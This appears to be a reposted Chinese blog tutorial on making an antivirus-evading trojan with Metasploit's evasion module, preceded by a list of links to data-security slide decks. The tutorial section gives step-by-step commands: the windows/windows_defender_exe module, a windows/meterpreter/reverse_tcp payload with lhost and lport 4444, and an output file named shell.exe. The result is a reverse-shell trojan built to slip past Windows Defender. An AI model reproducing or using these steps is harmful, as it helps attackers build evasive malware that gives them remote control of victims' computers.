利用Metasploit制作免杀木马
2020-03-24 20:27:34 Author: mp.weixin.qq.com(查看原文) 阅读量:115 收藏

请大家认真选择投票项,后续更新以此作为依据。

今日更新PPT内容11个,内容:数据安全,

CASB保护零信任环境的数据安全实践:

https://www.secshi.com/39625.html

以数据为中心的人工智能时代数据安全和隐私保护战略动力-GDPR的影响和对策:https://www.secshi.com/39547.html

数据安全的冰与火之歌 从 GDPR 看企业数据安全合规建设:https://www.secshi.com/39457.html

业务流量数据安全应用实践:https://www.secshi.com/39409.html

企业数据安全合规之路:https://www.secshi.com/39203.html

业务数据安全实践:https://www.secshi.com/39189.html

攻防对抗中数据安全的持续优化:https://www.secshi.com/39175.html

加快工业互联网数据安全能力建设 切实护航我国制造业高质量发展:https://www.secshi.com/39153.html

AiLPHA大数据安全分析应用于医疗网络安全闭环的实践:https://www.secshi.com/39145.html

数据安全的若干误解:https://www.secshi.com/39115.html

数据安全保障工程:https://www.secshi.com/39113.html

前言

Metasploit 5.0的时候更新一个Evasion模块,这个模块能非常快捷的生成反杀毒软件的木马,注意!低于5.0以下的版本是没有Evasion模块的,所以需要手动更新Metasploit

Metasploit更新

如果是使用kail的同学就直接使用msfupdate就能进行更新,如果是使用别的系统的小伙伴就请进入到Metasploit目录下面的bin目录下面,运行msfupdate

利用

打开metasploit

查看evasion模块

这里我们选择第五个模块

use windows/windows_defender_exe

查看需要配置的参数

show options

可以看到只有一个文件名的参数可以配置,我们就修改为shell.exe吧

紧接着我们要配置回显payload

set payload windows/meterpreter/reverse_tcp
set lhost you-ip
set lport 4444

使用exploit或者run 执行

看到回显信息我们可以看到木马存放在/root/.msf4/local/下面
我们来检测一下免杀效果

来自安全师作者GEIT,博客地址:http://www.geit.work/


文章来源: http://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247485070&idx=1&sn=768ab4dd93fb9ae62c9a5a3ad3501936&chksm=fa177a4dcd60f35b20a4a5aa08e46d48ddcfcd4b5b8cc3b7574ea8c6e2bf979199e94153e70f#rd
如有侵权请联系:admin#unsafe.sh